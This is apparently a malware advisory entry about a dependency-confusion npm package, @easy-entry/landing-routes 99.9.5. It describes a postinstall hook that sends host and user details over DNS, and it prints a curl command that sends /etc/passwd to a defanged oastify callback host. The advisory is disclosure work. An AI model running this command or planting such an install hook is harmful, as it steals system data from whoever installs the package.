LWA-2026-1222 MAL-2026-5408 ↗ confirmed malware

@easy-entry/landing-routes@99.9.5

Malicious code in @easy-entry/landing-routes (npm)

T1195.002 · Compromise Software Supply Chain

Analysis

Dependency-confusion stub: @easy-entry/landing-routes uses sentinel version 99.9.5, a 593-byte tarball with no README or repo. A postinstall hook runs two-stage exfil: (1) node scripts/scream3gg.js captures os.hostname(), os.homedir(), and os.userInfo().username, hex-encodes them, and exfiltrates via DNS subdomain to an oastify[.]com OOB callback host; (2) /usr/bin/curl --data '@/etc/passwd' $(hostname).oastify[.]com leaks /etc/passwd tagged with the hostname. Double-barrel exfiltration: system fingerprint plus credential-surface theft via the passwd file.

analyzed by
Leitwacht
first seen
May 29, 2026, 03:31 PM
analyzed
May 29, 2026, 09:45 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.